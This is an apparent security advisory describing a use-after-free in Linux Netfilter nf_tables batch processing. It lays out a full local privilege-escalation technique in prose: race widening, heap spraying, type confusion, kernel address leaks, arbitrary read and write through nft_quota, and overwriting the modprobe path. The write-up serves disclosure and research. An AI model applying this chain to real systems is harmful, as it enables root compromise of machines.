# Use-After-Free in Netfilter nf_tables when processing batch requests ## Vulnerability Details The affected code originates from the official Linux kernel from https://kernel.org/ and is part of the Netfilter nf_tables component (net/netfilter/nf_tables_api.c). Netfilter nf_tables allows to update its configuration as an atomic operation. When using this feature, the user-mode clients send batch requests containing a list of basic operations. Netfilter nf_tables then processes all the operations within the batch as single transaction. When processing the batch, Netfilter nf_tables then checks the configuration state updates to ensure that each successive basic operation is valid and this also accounts for the state updates from all the previous operations within the batch. However, the currently implemented check is insufficient. In our specific scenario we start with a Netfilter nf_tables configuration that has an `nft_rule` with `lookup` expression on anonymous `nft_set`, and where the anonymous `nft_set` contains some elements. Next, we send a batch request containing the following two basic operations: 1. `NFT_MSG_DELRULE` operation to delete the `nft_rule`. Note that this also implicitly deletes the `lookup` expression and the anonymous `nft_set`. 2. `NFT_MSG_DELSETELEM` operation to delete any of the elements of the deleted anonymous `nft_set`. The current version of Netfilter nf_tables accepts the above batch request. It then calls nf_tables_commit_release() that appends released resources to `nf_tables_destroy_list`. The `nf_tables_destroy_list` is then processed by nf_tables_trans_destroy_work() that first deallocates resources related to `NFT_MSG_DELRULE` operation by calling: nft_commit_release() nf_tables_rule_destroy() nf_tables_expr_destroy() expr->ops->destroy() that points to nft_lookup_destroy() nf_tables_destroy_set() nft_set_destroy() kvfree() that deallocates memory used by `nft_set` before processing `NFT_MSG_DELSETELEM` operation, where reference to the deallocated `nft_set` is accessed via nft_trans_elem_set() during the following calls: nft_commit_release() nf_tables_set_elem_destroy() nft_set_elem_ext() Within nft_set_elem_ext() above, the memory location of the deallocated `nft_set` is accessed to determine location of `nft_set_ext`: static inline struct nft_set_ext *nft_set_elem_ext(const struct nft_set *set, void *elem) { return elem + set->ops->elemsize; } for the operations that follow. So whenever the value of `set->ops->elemsize` gets corrupted, certain unexpected memory location could be interpreted as list of `nft_expr` to be destroyed: static void nf_tables_set_elem_destroy(const struct nft_ctx *ctx, const struct nft_set *set, void *elem) { struct nft_set_ext *ext = nft_set_elem_ext(set, elem); if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPRESSIONS)) nft_set_elem_expr_destroy(ctx, nft_set_ext_expr(ext)); ## Exploitation Techniques Exploiting the above vulnerability requires winning a race with nf_tables_trans_destroy_work() that executes from background worker thread from the Linux kernel. This seems to complicate practical exploitation even before we consider existing mitigations, such as hardening of kernel slab allocator, Kernel Address Space Layout Randomization (KASLR) and especially Control-Flow Integrity. However, the attached PoC proves that it is still possible to achieve reasonably reliable exploitation in practice. In order to exploit the vulnerability we need to modify content of memory from `nft_set` after it is deallocated under nf_tables_rule_destroy(), but before it is used under nf_tables_set_elem_destroy(). Both nf_tables_rule_destroy() and nf_tables_set_elem_destroy() are called within single invocation of nf_tables_trans_destroy_work() that executes from background worker thread from the Linux kernel. Further, the deallcated memory chunk is usually available for reuse only from the same CPU core. When racing with nf_tables_trans_destroy_work(), we improve our chances by adding a controlled delay for the background worker thread between it calls nf_tables_rule_destroy() and nf_tables_set_elem_destroy(). For that we insert an additional operation to destroy another `nft_set` containing a large number of elements. Additionally, we keep all the other CPU cores busy, such that the background worker thread is likely to be scheduled on a specific CPU core, so we can attempt to allocate a new structure from the same CPU core just after it deallocates `nft_set` under nf_tables_rule_destroy(). Our goal is to allocate a new `nft_set` of different type to reuse memory location of the `nft_set` deallocated under nf_tables_rule_destroy(). The new `nft_set` type is selected to use a different value for `set->ops->elemsize`. So when the background worker thread finally calls nf_tables_set_elem_destroy() to process `NFT_MSG_DELSETELEM` operation, it interprets its `elem` argument incorrectly, such that the corrupted `nft_set_ext *ext` is a few bytes after the correct location. This means that certain user-controlled data field of the original `nft_set_ext` are now interpreted as headers, resulting with type confusion. One way to abuse this type confusion is by crafting the corrupted `nft_set_ext` headers with offsets values such that nf_tables_set_elem_destroy() interprets content of any adjacent memory blocks as the list of `nft_expr` to destroy via the following calls: nft_set_elem_expr_destroy() __nft_set_elem_expr_destroy() nf_tables_expr_destroy() expr->ops->destroy() At this point of exploitation, we do not yet have details of the kernel memory layout. So it is not possible to craft absolute pointer addresses. However, when crafting the corrupted `nft_set_ext` headers we can still use out-of-range offsets, such that `expr->ops->destroy()` is called on certain valid `nft_expr` in the adjacent memory chunks. For this we spray `nft_log` expressions, with controlled NFTA_LOG_PREFIX. That `nft_log->prefix` is then deallocated by nft_log_destroy() once `expr->ops->destroy()` is called: static void nft_log_destroy(const struct nft_ctx *ctx, const struct nft_expr *expr) { struct nft_log *priv = nft_expr_priv(expr); struct nf_loginfo *li = &priv->loginfo; if (priv->prefix != nft_log_null_prefix) kfree(priv->prefix); Note that we can still access and even again deallocate this memory via the other reference from the sprayed `nft_log` expression. Additionally, we can also control the size of `nft_log->prefix`, such that it can be allocated from any of the slabs kmalloc-{8, ..., 192}. Finally, the refereed memory is interpreted as a string of characters by the kernel, so no need to worry about corruptions when we overlay different objects over it. This is essentially game over. One inconvenience is that any NULL characters terminate `nft_log->prefix`, so we cannot read past NULL bytes when leaking memory content. This is addressed in the next step, where we allocate `nft_object->udata` to reuse `nft_log->prefix` memory chunk and destroy the `nft_log` expression. This deallocates `nft_object->udata` memory, but now we can still use the `nft_object->udata` dangling pointer to leak memory content without restrictions on NULL bytes. Looking for suitable structures for the following steps, we decided on `nft_expr` allocated from nft_dynset_new(). These live in the same slabs as `nft_log->prefix` and `nft_object->udata`. And also, we have reasonable control over the allocation size, such that later we could easily switch between slabs of different size if needed. To use these structures, we create packet filter with `nft_dynset` expression. And when we send any packets over the loopback interface, `nft_dynset` expression calls nft_dynset_new() to create new elements for the associated `nft_set`. The created elements are stateful expressions of the following types: * `nft_counter` to obtain the location of `nf_tables.ko` in kernel memory. The structure includes a pointer to `nft_counter_ops` in `nf_tables.ko` kernel module. We leak this pointer by reading `nft_object->udata`. * `nft_quota` for arbitrary memory read and write. We can repeatedly deallocate and reallocate `nft_object->udata` to modify the `nft_quota->consumed` pointer. Next, we perform `NFT_MSG_GETSETELEM` operation that calls nft_quota_do_dump() to read the content of the referenced memory and passes the result as `NFTA_QUOTA_CONSUMED` attribute in the result. As for writes, we simply send packets over the loopback interface, where nft_quota_do_eval() calls: static inline bool nft_overquota(struct nft_quota *priv, const struct sk_buff *skb) { return atomic64_add_return(skb->len, priv->consumed) >= to modify `nft_quota->consumed`. We use the above arbitrary memory read to obtain base address of the kernel core. And then we proceed to modify "sbin" substring of "/sbin/modprobe" pathname, so it is replaced with "/tmp". The resulting pathname "//tmp/modprobe" is then used by the kernel to start a process with root privileges, where we control the file content. Note that we didn't put any intentional effort to bypass Control-Flow Integrity. However, for each of the exploitation steps, we consciously picked the most flexible and the most robust primitives. Turns-out, that our selection somehow avoided any of the primitives that could potentially be blocked by Control-Flow Integrity. We are now curious to confirm with testing that the resulting exploit really works against systems with Control-Flow Integrity mitigations.